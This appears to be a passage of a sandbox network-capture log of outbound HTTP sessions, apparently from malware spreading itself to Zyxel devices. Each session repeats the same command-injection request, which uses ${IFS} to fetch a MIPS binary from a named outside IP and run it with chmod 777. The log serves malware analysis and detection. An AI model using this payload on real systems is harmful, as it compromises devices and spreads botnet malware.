                                                      Feb 2, 2024 06:35:04.139425039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      325192.168.2.144354458.44.238.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.142457962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      326192.168.2.1445382179.138.168.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.142554998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      327192.168.2.143931625.90.194.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.142585039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      328192.168.2.1450978196.22.179.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.142605066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      329192.168.2.144712641.133.73.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.142617941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      330192.168.2.1455696186.150.247.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143178940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      331192.168.2.1433106210.30.71.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143219948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      332192.168.2.1433104102.39.187.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143255949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      333192.168.2.144776249.122.98.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143268108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      334192.168.2.1446722216.175.135.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143280983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      335192.168.2.1456404104.29.96.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143326998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      336192.168.2.143679040.139.129.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143392086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      337192.168.2.1441914169.17.17.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143402100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      338192.168.2.143663654.3.134.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143426895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      339192.168.2.1448196173.162.118.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143785000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      340192.168.2.1460816117.140.161.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143800020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      341192.168.2.1448520212.24.33.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143934011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      342192.168.2.1457632158.234.22.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:05.143974066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      343192.168.2.1453082154.56.122.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:06.149130106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      344192.168.2.1455914218.22.81.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:06.149171114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      345192.168.2.1457704107.34.101.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:06.149214029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      346192.168.2.1444254136.199.219.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:06.149266005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      347192.168.2.1454040151.220.11.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:06.149307966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      348192.168.2.144427235.53.104.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:06.149348021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      349192.168.2.1453502128.5.27.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:06.149523020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      350192.168.2.1444232132.139.253.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:06.149528980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      351192.168.2.1448298121.139.3.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:07.153898001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      352192.168.2.14374129.203.170.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:07.153898001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      353192.168.2.1444450155.185.76.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:07.153949976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      354192.168.2.144209263.15.20.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:07.153997898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      355192.168.2.1450352135.229.180.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:07.154028893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      356192.168.2.1447460173.218.190.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:07.154069901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      357192.168.2.1449822173.67.4.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:07.154270887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      358192.168.2.1434098138.213.14.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.157485008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      359192.168.2.1455618176.159.28.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.157540083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      360192.168.2.1440644112.26.132.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.157572985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      361192.168.2.1442212162.231.251.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.157788038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      362192.168.2.1446158137.159.185.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.157808065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      363192.168.2.1451742171.245.192.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.157953024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      364192.168.2.145198889.100.8.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.157988071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      365192.168.2.145280692.57.144.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158004045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      366192.168.2.145873066.129.32.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158052921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      367192.168.2.144036436.176.27.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158113003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      368192.168.2.1452720106.49.230.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158138990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      369192.168.2.1443052181.247.243.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158155918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      370192.168.2.1434696108.44.177.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158211946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      371192.168.2.143960065.92.144.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158232927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      372192.168.2.1447696102.199.170.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158309937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      373192.168.2.1436456102.186.101.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158345938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      374192.168.2.143980276.25.88.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158541918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      375192.168.2.1440918140.10.146.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158694983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      376192.168.2.1441788208.232.127.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158694983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      377192.168.2.1450140206.40.83.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:08.158828974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      378192.168.2.145572831.228.137.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162106991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      379192.168.2.145324659.3.188.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162179947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      380192.168.2.1433968218.56.241.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162214041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      381192.168.2.1457080189.174.207.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162245989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      382192.168.2.144537820.178.122.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162354946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      383192.168.2.1452180209.7.27.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162378073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      384192.168.2.1443106102.35.58.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162405014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      385192.168.2.1434872129.95.117.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162806988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      386192.168.2.1455300141.121.152.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:09.162844896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      387192.168.2.1460180125.252.20.204443
                                                      TimestampBytes transferredDirectionData
